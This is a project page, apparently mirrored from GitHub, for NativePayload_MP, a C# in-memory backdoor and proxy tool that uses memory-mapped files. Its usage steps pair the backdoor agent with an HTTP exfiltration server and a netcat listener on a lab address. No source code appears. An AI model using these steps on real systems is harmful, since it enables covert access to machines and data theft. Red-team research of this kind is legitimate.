项目作者: DamonMohammadbagher

项目描述 :
C# Backdoor & Mapper/Proxy tool (backdoor & proxy tool working in memory only)
高级语言: C#
项目地址: git://github.com/DamonMohammadbagher/NativePayload_MP.git
创建时间: 2021-03-11T16:32:03Z
项目社区:https://github.com/DamonMohammadbagher/NativePayload_MP

开源协议:

下载


NativePayload_MP

C# Memory Mapped File & Connection in-memory between Backdoor & Proxy Process

NativePayload_MP.cs (old version, this code was as Mapper for working with NativePayload_MPAgent as backdoor in Memory only)

usage:

  1. step1: NativePayload_MPAgent.exe
  2. step2: NativePayload_MP.exe

NativePayload_MP1.cs (this code is Mapper/Proxy tool for working with NativePayload_HTTP.sh as web Exfil-server tool)

usage:

  1. step1: [win] NativePayload_MPAgent.exe
  2. step2: [linux:192.168.56.1] NativePayload_HTTP.sh -exfilwebserver 80
  3. step3: [win] NativePayload_MP1.exe 192.168.56.1

NativePayload_MP2.cs (this code is Mapper/Proxy tool for working with nc [Netcat])

usage:

  1. step1: [win] NativePayload_MPAgent.exe
  2. step2: [linux:192.168.56.1] nc -lp 443
  3. step3: [win] NativePayload_MP2.exe 192.168.56.1 443

NativePayload_MPAgent.cs (this code is our backdoor tool, working in memory only, without network connection)

usage:

  1. step1: NativePayload_MPAgent.exe

Article [1]: https://www.linkedin.com/pulse/memory-mapping-file-connection-in-memory-between-damon-mohammadbagher/

Article [2]: https://damonmohammadbagher.github.io/Posts/10mar2021x.html

Video:


NativePayload_MP1.cs (this code is Mapper/Proxy tool for working with NativePayload_HTTP.sh as web Exfil-server tool)


NativePayload_MP.cs (old version, this code was as Mapper for working with NativePayload_MPAgent as backdoor in Memory only)


NativePayload_MP2.cs (this code is Mapper/Proxy tool for working with nc [Netcat])